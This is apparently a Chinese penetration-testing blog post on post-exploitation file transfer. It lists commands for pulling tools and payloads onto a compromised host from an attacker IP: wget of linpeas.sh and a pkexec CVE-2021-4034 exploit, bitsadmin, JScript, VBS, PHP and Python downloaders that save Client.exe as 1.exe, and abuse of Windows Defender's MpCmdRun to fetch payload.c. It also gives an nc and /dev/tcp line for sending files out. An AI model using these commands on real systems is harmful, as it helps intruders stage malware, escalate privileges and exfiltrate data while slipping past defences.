文章

文件传输

Posted 3 days ago Updated 3 days ago
By 奈幽
12~16 min read

文件下载命令快捷生成

https://forum.ywhack.com/bountytips.php?download

使用Python开启http服务

发送端(在待传输文件所在目录执行)

python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
python2.7 -m SimpleHTTPServer 8080

接收端:

wget http://192.168.56.102:8080/linpeas.sh
wget http://192.168.56.102:8080/pkexec-cve-2021-4034

nc

接收端操作:

nc -nlvp 9002 > 文件路径

发送端操作:

cat 文件路径 > /dev/tcp/192.168.56.102/9002

SCP

scp -P 22 file.txt user@1.1.1.1:/tmp

scp -r /path/to/source_folder username@destination_server:/path/to/destination_folder

rcync

rsync -avz /path/to/source_folder username@destination_server:/path/to/destination_folder

在这个命令中,-avz 选项意味着:

  • -a 表示传输时保持文件属性,递归地传输目录,保持链接,保持权限等。
  • -v 表示详细输出,您可以看到传输过程中的详细信息。
  • -z 表示启用压缩传输,可以节省带宽

perl

perl -MLWP::Simple -e 'die "下载失败" unless getstore("http://192.168.56.102/tools/linpeas.sh", "linpeas.sh")'

```
不支持https、ftp协议,php python带的服务器会出错
> bitsadmin /transfer n http://192.168.1.192/Client.exe  e:\1.exe
> bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
> bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
> bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "

FTP

> open 192.168.0.98 21
> 输入账号密码
> dir查看文件
> get file.txt

js

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");

> cscript /nologo 1.js http://192.168.1.192/Client.exe

PHP

#!/usr/bin/php 
<?php $data = @file("http://192.168.1.192/Client.exe");
$lf = "1.exe";         
$fh = fopen($lf, 'w');         
fwrite($fh, $data[0]);         
fclose($fh); 
?>

Python

python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'

Python3

python3 -c "import urllib.request; urllib.request.urlretrieve('https://192.168.56.102/tools/linpeas.sh', 'linpeas.sh')"

vbs

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2 
>cscript 1.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056//忽略HTTPS错误
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe"
ado.Close

wget

wget http://192.168.1.192/Client.exe
wget –b后台下载
wget –c 中断恢复

WindowsDefender

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c

image

其他利用
image
image
image

5-渗透后利用
License:  CC BY 4.0